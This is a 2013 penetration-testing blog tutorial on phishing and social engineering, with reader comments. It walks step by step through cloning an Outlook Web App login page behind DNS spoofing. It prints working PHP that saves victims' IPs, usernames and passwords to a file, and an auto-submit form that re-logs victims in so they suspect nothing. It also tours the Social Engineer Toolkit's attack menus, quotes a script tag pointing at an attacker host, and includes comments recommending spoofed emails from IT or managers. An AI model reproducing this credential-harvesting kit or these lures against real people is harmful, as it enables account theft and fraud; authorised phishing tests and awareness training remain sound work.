Phishing and social engineering techniques

April 18, 2013 by Ahmed Mohamed

Internet usage is growing dramatically, but the vast majority of internet users don’t have any security backgrounds. Neither do a large majority of companies care about information security and the severity of any attack that could harm the valuable assets of these companies. They don’t give their employees security awareness sessions, either. For these reasons humans, are the weakest link in the information security chain.

On the other hand, most information security pen-testers focus only on the client and server exploits (how to gain shell in a server by interacting with the server directly). They don’t focus how to exploit the weakest link in the information security chain –the humans (who you could own the shell by luring the victim to run the shell for you on his own machine by using any of social engineering techniques).

Let’s talk about phishing and social engineering techniques that a pen-tester could use to deceive their victims to get control over them. A major technique for this is “phishing.” According to Wikipedia, phishing is:

Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by e-mail spoofing or instant messaging and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

Social engineering definition according to Wikipedia:

Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. This is a type of confidence trick for the purpose of information gathering, fraud, or computer system access. It differs from traditional cons in that often the attack is often a mere step in a more complex fraud

Clone phishing

Clone phishing is a type of phishing attack where a hacker tries to clone a website that his victim usually visits. The cloned website usually asks for login credentials, mimicking the real website. This will allow the attacker to save these credentials in a text file or database record on his own server. Then the attacker redirects his victim to the real website as authenticated user. An attacker will also clone email content which will then forward a legitimate and previously-delivered email which contains an attachment or link that has had its content and recipient addresses taken. It will be used to create an almost identical or cloned email. Instead of sending the attachment or link within the email, the attacker will replace them with a malicious version and then send from an email address spoofed to appear to come from the original sender.

Clone phishing demo

The scenario of this demo will be like that. An attacker resides in the same physical network as the victim, and furthermore the victim usually accesses his mail server using Outlook Web Application (OWA) server. For this reason, the attacker decides to attack the victim while accessing the Outlook Web Application (OWA) server. As a consequence of this decision, the attacker conducts a Man-In-The-Middle attack (MITM) attack, and then starts sniffing all communication traffic back and forth between the victim and the gateway. (“Click here for Password Cracking Using Cain and Abel“), but unfortunately, the traffic was encrypted so he decided to use clone phishing techniques to capture the traffic of his victim.

According to this scenario, that attacker should take the following steps for successful exploitation:

  1. Launch a webserver owned by the attacker.
  2. Build the same hierarchy of the Outlook Web Application (OWA) server.
  3. Clone the same view and design of the Outlook Web Application (OWA) server.
  4. Write the PHP code that will save the credentials in a text file.
  5. Launch DNS Spoofing attack to redirect his victim to the fake Outlook Web Application (OWA) server, or just send an email address to convince the victim to access the fake Outlook Web Application (OWA) server.

Step 1: Launch a webserver owned by the attacker.

The attacker should make sure that he has a webserver under his control in the same network where the victim resides. The webserver vendor doesn’t matter at all; there are tons of webservers that the attacker can use such as (“Apache”, “IIS”, ETC).

Step 2 and step 3

There are many tools that automate those two steps such as httrack, ScrapBook Firefox extension, etc. These tools will build the same hierarchy of the Outlook Web Application (OWA) server as well as the view and design of the Outlook Web Application (OWA) server, which include HTML , Java Script , CSS , images.

3- Step 4: write the PHP code that will save the credentials in a text file

The PHP code that the attacker will use can be very simple or complex according to an attacker’s scenario. According to our scenario, a simple PHP code will suffice.

<? $FileHandle = fopen (“Credentials.txt” , “a”) or die(“can’t open file”) ; $ip = $_SERVER[‘REMOTE_ADDR’]; $username = $_POST[‘username’]; $password = $_POST[‘password’]; fwrite($FileHandle, “Remote IP : $ip || Username : $username || Password : $password n”) ; fclose($FileHandle); ?>
<script type=”text/javascript”>
window.onload = function () {
var form = document.getElementById(“OWASubmit”);

function OnFormSubmit() {
alert(“Submitting form.”);

<form id=”OWASubmit”action=”https://owa.target.com/OWA/auth/owaauth.dll” method=”POST” onsubmit=”OnFormSubmit”>
<input type=”hidden” name =”destination” value=”https://owa.target.com/OWA/” />
<input type=”hidden” name=”flags” value =”0″ />
<input type=”hidden” name=”forcedownlevel” value =”0″ />
<input type=”hidden” name=”trusted” value =”0″ />
<input type=”hidden” name=”username” value =”<?echo $username?>” />
<input type=”hidden” name=”password” value =”<?echo $password?>” />
<input type=”hidden” name=”isUtf8″ value =”1″ />


For explanation purposes, this code will be divided into three parts as follows:

The first part

<? $FileHandle = fopen (“Credentials.txt” , “a”) or die(“can’t open file”) ; $ip = $_SERVER[‘REMOTE_ADDR’]; $username = $_POST[‘username’]; $password = $_POST[‘password’]; fwrite($FileHandle, “Remote IP : $ip || Username : $username || Password : $password n”) ; fclose($FileHandle); ?>

This is the part of the code that responsible for retrieving the remote IP address, username and password information from the coming requests, and saving them in a file called Credentials.txt, then finally closes the file handler.

The second part


<form id=”OWASubmit” action=”https://owa.target.com/OWA/auth/owaauth.dll” method=”POST” onsubmit=”OnFormSubmit”><input type=”hidden” name=”destination” value=”https://owa.target.com/OWA/” />
<input type=”hidden” name=”flags” value=”0″ />
<input type=”hidden” name=”forcedownlevel” value=”0″ />
<input type=”hidden” name=”trusted” value=”0″ />
<input type=”hidden” name=”username” value=”<?echo $username?>” />
<input type=”hidden” name=”password” value=”<?echo $password?>” />
<input type=”hidden” name=”isUtf8″ value=”1″ />


The second part is an HTML form tag that has all POST parameters needed to re-login the victim with the real OWA server, because it’s important that the victim doesn’t see anything suspicious.

The third part

<script type=”text/javascript”>
window.onload = function () {
var form = document.getElementById(“OWASubmit”);

function OnFormSubmit() {
alert(“Submitting form.”);

The third part is the java script code that will auto-submit the previous POST form to the real OWA sever.

Step 5: send an email address to convince the victim to access the fake Outlook Web Application (OWA) server.

The attacker will send the fake OWA server URL to his victim by sending it through any email server. The email content must not be suspicious because the attacker needs to convince the victim to click on it and enter his credentials.

Social engineer toolkit

The Social Engineer Toolkit (SET) was created and written by David Kennedy (ReL1K). SET is an open source python-driven tool that focuses solely on attacking the weakest link in information security chain –which is the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

The Social Engineer (SET) is included in the latest version of the most popular Linux distribution focused on security, Back|Track. It can also be downloaded through github using the following command:

git clone https://github.com/trustedsec/social-engineer-toolkit/ set/ .

Social engineer toolkit menu

Social Engineer Toolkit (SET) is a menu-driven based attack system, which means it’s not a command line tool; this decision had been made because of how social engineer attacks occur. It requires multiple scenarios, options, and customizations. Moreover if SET developed as a command line based it would limit the effectiveness of the attacks. Now it’s the time to step by the SET menu and take a quick and a brief walkthrough of most of these attack vectors.

  1. Social-Engineering Attacks
  2. Fast-Track Penetration Testing
  3. Third Party Modules
  4. Update the Metasploit Framework
  5. Update the Social-Engineer Toolkit
  6. Update SET configuration
  7. Help, Credits, and About

The most important item in this menu is Social Engineering Attacks that includes all the attack vectors. Most of these items in this menu are self-explanatory, like using fast track penetration testing frameworks, using third party modules, updating the Metasploit framework, updating the Social Engineer Toolkit (SET) itself, and updating SET configuration.

Social engineer toolkit usage

To open Social Engineer Toolkit (SET) in Backtrack distribution, go to Applications -> BackTrack -> Exploitation Tools -> Social Engineering Tools -> Social Engineering Toolkit ->SET

Click for a larger view

The SET will open in the terminal and will look like the following screenshot (of course you have installed the latest version of SET).

Click for a larger view

Now let’s select social engineering attacks from the menu. Once we choose them, we will get the sub menu list, which gives details about the further type of attack as shown below :

  1. Spear-Phishing Attack Vectors
  2. Website Attack Vectors
  3. Infectious Media Generator
  4. Create a Payload and Listener
  5. Mass Mailer Attack
  6. Arduino-Based Attack Vector
  7. SMS Spoofing Attack Vector
  8. Wireless Access Point Attack Vector
  9. QRCode Generator Attack Vector
  10. Powershell Attack Vectors
  11. Third Party Modules

Click for a larger view

Now let’s select the website attack vectors from the menu. Once we choose the vector, we will get the sub menu list, which gives details about the further type of attack as shown below:

  1. Java Applet Attack Method
  2. Metasploit Browser Exploit Method
  3. Credential Harvester Attack Method
  4. Tabnabbing Attack Method
  5. Man Left in the Middle Attack Method
  6. Web Jacking Attack Method
  7. Multi-Attack Web Method
  8. Victim Web Profiler
  9. Create or import a CodeSigning Certificate
  • “The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
  • The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
  • The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
  • The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
  • The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
  • The Man Left in the Middle Attack method was introduced by Kos and utilizes HTTP REFERER’s in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate[plain]<script src=”http://YOURIP/”>[/plain]This could either be from a compromised site or through XSS.
  • The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to
    make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
  • The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.”

SET provides you a small explanation about each attack method that will help you to choose which one of these attack methods will suit the hacker vision and scenario, Here is the explanation.


Remember that most Internet users don’t have a security background. Neither do the vast majority of companies care about information security. They do not realize severity of any attack that could harm the valuable assets of these companies, nor do they give their employees security awareness sessions. For these reasons, using social engineering techniques is very important stage in penetration testing methodology which most of pen-testers do not focus on, despite its value


Posted: April 18, 2013
Ahmed Mohamed
View Profile

Ahmed Elhady Mohamed is a researcher at InfoSec Institute and an information security professional and author. He focuses mainly in the areas of exploitation,reverse engineering and web security. He's the webmaster of www.ITsec4all.com

3 responses to “Phishing and social engineering techniques”

  1. Terry B says:

    Hi Ahmed,

    Great article – as a Penetration Tester I actively engage in Social Engineering attacks on behalf of my clients; the results are gathered and used for Security User Awareness and Education campaigns.

    While i have not spent much time writing PHP, I can attest to the value of using the Social Engineering toolkit to clone a site and harvest credentials. I find this to be a very valuable tool due to its ease and the speed at which a site can be stood up.

    To date, I have performed over 100 of these types of phishing tests and have found my success significantly increases when combined with SMTP spoofing methods which allow for the sending of emails which appear to arrive “from” the user’s IT department or Manager.

    Just food for thought.

    Great work!
    Terry B.

    • Ahmed Elhady Mohamed says:

      Thanks Terry for your great feedback,
      And actually using SET with SMTP spoofing methods are very successful way to trick your victims because it’s hard to make sure of that the recieved email is really from your manager not form an attacker 🙂

  2. Joseph says:

    This is such a great article but I’ll like to ask if the 3rd aspect of your code could be included in the major clone of the site because from what I see, we should have two files to upload on the server for harvesting credentials and it should be the action file and the clone of the target website

Leave a Reply

Your email address will not be published.